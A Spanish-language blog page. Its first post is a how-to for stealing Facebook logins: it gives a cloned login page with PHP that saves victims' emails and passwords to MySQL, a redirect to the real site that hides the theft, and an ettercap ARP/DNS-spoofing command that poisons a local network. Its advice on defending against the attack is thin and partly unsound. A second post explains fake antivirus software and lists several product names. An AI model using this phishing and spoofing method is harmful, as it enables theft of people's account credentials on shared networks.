lunes, 20 de octubre de 2014

ATAQUE DNS SPOOFING




COMO REALIZAR  UN SITIO (DE FACEBOOK) POR MEDIO DE UN ATAQUE DE HOMBRE EN MEDIO.

MATERIAL:
·         Computadora de escritorio o Laptop
·          Sistema operativo Kali Linux
·         Programa VMWare (este nos servirá para nuestra maquina atacante sea de forma virtual)
·         Generador de bases de datos (opcional)
·         Internet
El primer paso que haremos es entrar a símbolos de sistema para saber la “IP”  de nuestra máquina que utilizaremos de servidor web; una vez dentro de símbolos de sistema de Windows utilizaremos el siguiente comando para mostrarnos nuestra dirección IP.

Una vez tecleado el comando ip config daremos enter y tendrá que desplazarnos la dirección ip de nuestra máquina que utilizaremos como servidor de la página web.

Una vez esto capturaremos los datos (Ip’s) en un bloc de notas, esto  nos servirá para realizar el ataque en el sistema operativo Kali Linux; ya una vez obtenida nuestra ip lo que haremos será descargar la plantilla o página de Facebook.







Esto es para hacer el ataque a los usuarios conectados dentro de un host, ahora el siguiente paso es realizar una base de datos en la cual nosostros podamos guardar los datos que nos interesan, en este caso los datos que nos interesan es “e-mail y contraseña” , la base de datos se crea en el generador de bases de datos de tu preferencia, en este caso se utilizo mysql.
        Ya que se descargó la página hacemos uso de netbeans en el cual comenzara la inyección de código.
Descripción: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvt5VHNzJiJZ4zP64irmcbEhOVOX6ixs5kJ2cCDgOFSvN7OiMWn8FHjh_afJ5v70I8W_xBE2lXc3sMfKeVCyobGgSuTr9TgrK4lfB_3KmcCHS3dS2KN6Id2jfBGPmNN3GIwVmo4CcEBsiT/s1600/1b.png



Vamos un nuevo proyecto y a nuestro primer archivo lo llamamos conexión, e utilizamos el siguiente codigo :
En este punto se manejan las conexiones que enlazaran nuestro sistema a un gestor de bases de datos en nuestro caso nuestro gestor es xampp
<?php
// conexion con MySQL clientes
        $dbhost="localhost";
        $dbuser="root";
        //dbpass="password";
        //el pasword se encuentra en blanco
        $dbname="cuenta_face";//nombre de la bd
        $tabla="registros";
        mysql_connect($dbhost, $dbuser); //se hace la conexion con mysql
        mysql_select_db($dbname); //se selecciona la bd
(Aquí se manejaras todas las conexiones, para enlazarnos con la base de datos (mysql).


En esta pagina falsa de facebook, vamos a utilizar el siguiente codigo, para tomar lo valores de los campos, correo electronico y contraseña para registrarlos en nuestra base de datos.
codigo
<form method="POST" action="http://localhost/PhpProject1/index.php" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">
                <input type="hidden" name="lsd" value="AVqX0AAv" autocomplete="off">
                <?php
if(isset($_POST["Registrar"]))
    {
include("conexion.php");
    $user=$_POST["user"];
    $pass=$_POST["pass"];
    {
  Aquí se  insertan los datos de la víctima:
        $sql="INSERT INTO registros (user,pass)values('$user','$pass');";
}
if(!mysql_query($sql))
    echo "No se pudieron registrar los datos";
else 
     ?>
<br>

Esta es la pagina original de error de facebook que nos arrojara automaticamente despues de haber ingresado los datos, la pagina se redirecciona automaticamente para evitar cual tipo de sospecha.
Codigo para redericcionar:
<meta http-equiv="Refresh" content="1;url=https://www.facebook.com/login.php?login_attempt=1">
<?php
}
else
{
?>
<form name="registros" action="http://localhost/Phpproject1/index_falla.php" method="POST">







ATAQUE DNS SPOOFING

Ahora entraremos en una maquina virtual con el sistema operativo kali inux el cual sera la                         maquina atacante.                              
Dentro de nuestra maquina virtual atacante lo que haremos sera lo siguiente. Daremos doble click en el icono computer para buscar archivos del sistema de nuestro sistema.
Al abrir la ventana debe ser parecida a la siguiente:

Dentro de esta ventana prosegiremos a buscar nuestro archivo llamado etter.dns, para encontrar este archivo daremos clic sobre file System.
Dentro de esta carpeta buscaremos una sub carpeta llamada ‘usr’, una vez localizada daremos clic para abrirla.
Dentro de la carpeta “usr” buscaremos otra subcarpeta llamada ‘share’ y la abrimos dándole doble clic.

Una vez dentro de esta carpeta buscaremos una carpeta llamada ettercap ya que esta carpeta es la que contiene nuestro archivo que buscamos, la abrimos dándole clic.
Una vez dentro de la carpeta “ettercap” buscaremos  nuestro archivo llamado etter.dns, aquí abriremos nuestro archivo para modificarlo.
Dentro de este archivo lo que haremos es cambiar la dirección de ip al Facebook original, haciendo creer a la víctima que en realidad está introduciendo su usuario y contraseña en la página autentica,
Para eso nos dirigimos a la parte donde dice #suplantación de servidor DNS y escribimos la dirección de www.facebook.com o facebook.com  y tecleamos la ip de nuestra máquina que servirá de servidor, Una vez hecho esto solo cerramos la ventana.
Una vez cerrada nos dirigiremos a la terminal de Kali Linux donde teclearemos el siguiente comando
ettercap –T –q –M arp: remote –P dns_spoof //, y damos enter para ejecutarlo, este comando servirá para infectar nuestra red y robar el usuario y contraseña del usuario que ingrese a Facebook con la red infectada.
Solo esperamos a que termine el proceso de infección y llegue al 100%. Cuando este proceso llegue al 100% la red estará infectada y solo queda esperar que algún usuario entre a nuestra página falsa de Facebook.com o nosotros mismos podemos verificarlo estando dentro del mismo host.
En nuestro caso lo verificamos con una máquina virtual para saber si se estaba realizando la infección de la red correctamente, para esto solo tecleamos en la barra de dirección www.facebook.com o Facebook.com.
Como se ve en la imagen el ataque funciono correctamente ya que el usuario no sabe que está a punto de ser atacado ya que descargamos la plantilla web de Facebook y no tiene sospecha.
Para que el usuario no sospeche que ha sido robado su usuario y contraseña al momento de dar clic en iniciar sesión será redirigido a la página de Facebook original y así no se tendrá sospecha alguna de que se le ha robado su usuario y su contraseña de Facebook.
Aquí el usuario es redirigido a la página oficial y original de Facebook.

Como último solo nos queda entrar al local host de nuestra máquina que sirvió de servidor y entrar a nuestra base de datos creada para así mirar los usuarios afectados por este ataque.


¿Cómo podemos protegernos de estos ataques?
Podemos protegernos de estos ataques tecleando la ip de la página de Facebook, ya que la infección solo se hace si se teclea www.facebook.com y con la ip de Facebook no habría ningún problema
No entrar al sitio si en la dirección no está escrita http”S”; ejemplo. https://www.facebook.com, como se ve debe estar escrita la s en http ya que es un método de seguridad y estar seguro que es la página original.


miércoles, 1 de octubre de 2014

Qué es el Rouge Software?

El Rouge Software es un un programa informático malintencionado (falsos programas de seguridad), que no son lo que aparentan ser, si no mas bien todo lo contrario, nos lo venden como una solución para evitar "contagio" de cualquier tipo de virus.

Estos falsos antivirus, muestran un resultado de infección, cuando "escanea" nuestra computadora, pero en realidad no realiza ningún tipo de escaneo en nuestro computador y por lo mismo no eliminara ningún tipo de infección, 

En la imagen se muestra un ejemplo de como funcionan estos programas.

Ejemplo de resultado de escaneo.

Por que lo hacen?

Todos estos tipos de programa se hacen con un solo fin, que es vender la versión completa de sus programa, para escanear, limpiar eliminar todas las infecciones que se "encontraron", para obtener la mayor ganancia  económica posible.

Como saber si ya estamos infectados?

Por lo general nuestra PC empieza a alentarse, empiezan a salir ventanas emergentes de la nada. falsos mensajes de alertas, no se puede ejecutar nuestro antivirus, etc.

Como es que nos infectamos? 

Generalmente  cuando nos piden que necesitamos instalar algún plug-in al entrar a sitios pornográficos o al querer ver películas en linea, al visitar sitios fraudulentos, etc.

Como evitar ser infectados?
Mantener el sistema operativo actualizado, contar con un buen antivirus y por supuesto que este actualizado, siempre investigar antes de descargar algo en linea, 

Como eliminarlos?
Encontrar los archivos infectados y des infectarlos de forma manual, aunque es realmente difícil.


Algunos de los "falsos antivirus" son:

  1. #1 Spyware Killer
  2. 1 Click Spy Clean
  3. 100 Percent Anti-Spyware
  4. 1-2-3 Spyware Free
  5. 1stAntiVirus
  6. 2004 Adware/Spyware Remover & Blocker
  7. 2-AntiSpyware
  8. Antivirus Suite
  9. AVCare
  10. about:blank
  11. Active Security
  12. Ad Butcher
  13. AdArmor
  14. AdDriller
  15. AddwareRemover
  16. Addwere
  17. Ad-Eliminator
  18. AdEradicator
  19. AdFlusher
  20. Ad-Protect

Estos son algunos, ya que la lista puede llegar hacer hasta mas de 60.